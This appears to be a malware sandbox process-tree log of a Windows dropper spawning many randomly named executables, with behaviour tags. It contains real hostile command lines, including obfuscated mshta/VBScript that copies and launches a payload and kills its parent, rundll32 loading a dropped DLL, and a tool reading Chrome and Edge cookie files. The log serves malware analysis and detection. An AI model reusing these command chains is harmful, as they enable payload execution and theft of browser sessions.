C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i58⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i59⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i60⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i61⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i62⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i63⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i64⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i65⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i66⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i67⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i68⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i69⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i70⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i71⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i72⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i73⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i74⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i75⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i76⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i77⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i78⤵
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 309⤵
- Runs ping.exe
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\xGwlY1eHaAxl2nopM4UhoAxj.exe"C:\Users\Admin\Documents\xGwlY1eHaAxl2nopM4UhoAxj.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 2967⤵
- Program crash
-
C:\Users\Admin\Documents\eNNVOsvsf9x46Z2RU_3aG0Cq.exe"C:\Users\Admin\Documents\eNNVOsvsf9x46Z2RU_3aG0Cq.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 2367⤵
- Program crash
-
C:\Users\Admin\Documents\5DzlbmPqiOlR4RCUHoSkIIU7.exe"C:\Users\Admin\Documents\5DzlbmPqiOlR4RCUHoSkIIU7.exe"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\2FlP0ocRikYkPZQPgNf79H9C.exe"C:\Users\Admin\Documents\2FlP0ocRikYkPZQPgNf79H9C.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 2807⤵
- Program crash
-
C:\Users\Admin\Documents\JQw9U4gDjUapeWseAbwsrsP6.exe"C:\Users\Admin\Documents\JQw9U4gDjUapeWseAbwsrsP6.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 2527⤵
- Program crash
-
C:\Users\Admin\Documents\g9HwOQsRhP7L9P3Kg2NPhIt0.exe"C:\Users\Admin\Documents\g9HwOQsRhP7L9P3Kg2NPhIt0.exe"6⤵
-
C:\Users\Admin\Documents\3UX_RvMI1i2mfeClQjgRNPIC.exe"C:\Users\Admin\Documents\3UX_RvMI1i2mfeClQjgRNPIC.exe"6⤵
-
C:\Users\Admin\Documents\3UX_RvMI1i2mfeClQjgRNPIC.exe"C:\Users\Admin\Documents\3UX_RvMI1i2mfeClQjgRNPIC.exe"7⤵
-
C:\Users\Admin\Documents\LjUDdJ9VPYbUIROgYGDA7Ykq.exe"C:\Users\Admin\Documents\LjUDdJ9VPYbUIROgYGDA7Ykq.exe"6⤵
-
C:\Users\Admin\Documents\HPhKqRrEWxtv3cWA25HZzX7m.exe"C:\Users\Admin\Documents\HPhKqRrEWxtv3cWA25HZzX7m.exe"6⤵
-
C:\Users\Admin\Documents\aK3lLupqGYuo8pISdDq8BzZR.exe"C:\Users\Admin\Documents\aK3lLupqGYuo8pISdDq8BzZR.exe"6⤵
-
C:\Users\Admin\Documents\uBqfRTLvHLA3yPPUb3K6rP5G.exe"C:\Users\Admin\Documents\uBqfRTLvHLA3yPPUb3K6rP5G.exe"6⤵
-
C:\Users\Admin\Documents\uBqfRTLvHLA3yPPUb3K6rP5G.exeC:\Users\Admin\Documents\uBqfRTLvHLA3yPPUb3K6rP5G.exe7⤵
-
C:\Users\Admin\Documents\zpdiKLL11oa6WZWaSQSWtOFT.exe"C:\Users\Admin\Documents\zpdiKLL11oa6WZWaSQSWtOFT.exe"6⤵
-
C:\Users\Admin\Documents\9pmqI0njX9ocb89mzSKj8Pfh.exe"C:\Users\Admin\Documents\9pmqI0njX9ocb89mzSKj8Pfh.exe"6⤵
-
C:\Users\Admin\Documents\sgc5lZJP8U5GH8kRfIKhJSTE.exe"C:\Users\Admin\Documents\sgc5lZJP8U5GH8kRfIKhJSTE.exe"6⤵
-
C:\Users\Admin\Documents\sgc5lZJP8U5GH8kRfIKhJSTE.exeC:\Users\Admin\Documents\sgc5lZJP8U5GH8kRfIKhJSTE.exe7⤵
-
C:\Users\Admin\Documents\VFZEerJVs_1T_90qlzN9ZqJ0.exe"C:\Users\Admin\Documents\VFZEerJVs_1T_90qlzN9ZqJ0.exe"6⤵
-
C:\Users\Admin\Documents\5Qsxp2swv9sOKcyWb5I2ShmD.exe"C:\Users\Admin\Documents\5Qsxp2swv9sOKcyWb5I2ShmD.exe"6⤵
-
C:\Users\Admin\Documents\jeu1oqDHUl5SDs9zxq30w0RB.exe"C:\Users\Admin\Documents\jeu1oqDHUl5SDs9zxq30w0RB.exe"6⤵
-
C:\Users\Admin\Documents\jeu1oqDHUl5SDs9zxq30w0RB.exe"C:\Users\Admin\Documents\jeu1oqDHUl5SDs9zxq30w0RB.exe" -q7⤵
-
C:\Users\Admin\Documents\jeZlNxgTItXORQrLXnog8KBk.exe"C:\Users\Admin\Documents\jeZlNxgTItXORQrLXnog8KBk.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 3207⤵
- Program crash
-
C:\Users\Admin\Documents\X81QsGIrDhwELGpRSE3WWiN3.exe"C:\Users\Admin\Documents\X81QsGIrDhwELGpRSE3WWiN3.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\X81QsGIrDhwELGpRSE3WWiN3.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\X81QsGIrDhwELGpRSE3WWiN3.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\X81QsGIrDhwELGpRSE3WWiN3.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\X81QsGIrDhwELGpRSE3WWiN3.exe" ) do taskkill -f -iM "%~NxA"8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "X81QsGIrDhwELGpRSE3WWiN3.exe"9⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a10⤵
-
C:\Users\Admin\Documents\ZDE3ECVq05BSOQj2smjEbF1t.exe"C:\Users\Admin\Documents\ZDE3ECVq05BSOQj2smjEbF1t.exe"6⤵
-
C:\Users\Admin\Documents\rROBCchWWTlirKnxNTtPfQYj.exe"C:\Users\Admin\Documents\rROBCchWWTlirKnxNTtPfQYj.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\8125650.exe"C:\Users\Admin\AppData\Roaming\8125650.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7308 -s 23488⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7308 -s 23488⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\5046388.exe"C:\Users\Admin\AppData\Roaming\5046388.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\7140566.exe"C:\Users\Admin\AppData\Roaming\7140566.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\4689462.exe"C:\Users\Admin\AppData\Roaming\4689462.exe"7⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 24208⤵
- Program crash
-
C:\Users\Admin\Documents\D7ReN7UK1sA3gikP6FY9y2XT.exe"C:\Users\Admin\Documents\D7ReN7UK1sA3gikP6FY9y2XT.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 2727⤵
- Program crash
-
C:\Users\Admin\Documents\od3hwKK5ffAYcW2BdzgZGPux.exe"C:\Users\Admin\Documents\od3hwKK5ffAYcW2BdzgZGPux.exe"6⤵
-
C:\Users\Admin\Documents\4mL7PIsrBxP63urh1QmHehZ8.exe"C:\Users\Admin\Documents\4mL7PIsrBxP63urh1QmHehZ8.exe"6⤵
-
C:\Users\Admin\Documents\4mL7PIsrBxP63urh1QmHehZ8.exe"C:\Users\Admin\Documents\4mL7PIsrBxP63urh1QmHehZ8.exe"7⤵
-
C:\Users\Admin\Documents\ia1MHm1lYz3r0voRKpQs6rjX.exe"C:\Users\Admin\Documents\ia1MHm1lYz3r0voRKpQs6rjX.exe"6⤵
-
C:\Users\Admin\Documents\DdpglFtsiZBBzbXSmeyz6U6p.exe"C:\Users\Admin\Documents\DdpglFtsiZBBzbXSmeyz6U6p.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QAKHR.tmp\DdpglFtsiZBBzbXSmeyz6U6p.tmp"C:\Users\Admin\AppData\Local\Temp\is-QAKHR.tmp\DdpglFtsiZBBzbXSmeyz6U6p.tmp" /SL5="$10546,138429,56832,C:\Users\Admin\Documents\DdpglFtsiZBBzbXSmeyz6U6p.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-U7VJG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-U7VJG.tmp\Setup.exe" /Verysilent8⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629409794 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 7647⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\Ru2g9dyDXRqqP8FUDSDjGSi1.exe"C:\Users\Admin\Documents\Ru2g9dyDXRqqP8FUDSDjGSi1.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 2483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\9pu6ZzTydrY4HqpFvgkh7vUp.exe"C:\Users\Admin\Documents\9pu6ZzTydrY4HqpFvgkh7vUp.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\4vkZ6xvCtasEgPgU5efQ2zsc.exe"C:\Users\Admin\Documents\4vkZ6xvCtasEgPgU5efQ2zsc.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3812 -s 2723⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\FgOhhXJLTU1nZrio5X0acnhy.exe"C:\Users\Admin\Documents\FgOhhXJLTU1nZrio5X0acnhy.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\FgOhhXJLTU1nZrio5X0acnhy.exeC:\Users\Admin\Documents\FgOhhXJLTU1nZrio5X0acnhy.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\6Vjqsftth3b8s5llu58YX3hF.exe"C:\Users\Admin\Documents\6Vjqsftth3b8s5llu58YX3hF.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\csRXMysOJL0YGdyvme_zDVin.exe"C:\Users\Admin\Documents\csRXMysOJL0YGdyvme_zDVin.exe"2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\csRXMysOJL0YGdyvme_zDVin.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\csRXMysOJL0YGdyvme_zDVin.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\csRXMysOJL0YGdyvme_zDVin.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\csRXMysOJL0YGdyvme_zDVin.exe" ) do taskkill -f -iM "%~NxA"4⤵
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "csRXMysOJL0YGdyvme_zDVin.exe"5⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\Y9UTyxgAjYMuXPTHvz7nlNN_.exe"C:\Users\Admin\Documents\Y9UTyxgAjYMuXPTHvz7nlNN_.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 3203⤵
- Program crash
-
C:\Users\Admin\Documents\RveVJd4lZZ8lQgQ5HvUienH0.exe"C:\Users\Admin\Documents\RveVJd4lZZ8lQgQ5HvUienH0.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\YFUDsEl7DyBYIIJtIuv6QrfC.exe"C:\Users\Admin\Documents\YFUDsEl7DyBYIIJtIuv6QrfC.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\tE2ZTPUnIZM0y6KDACav1Tf0.exe"C:\Users\Admin\Documents\tE2ZTPUnIZM0y6KDACav1Tf0.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
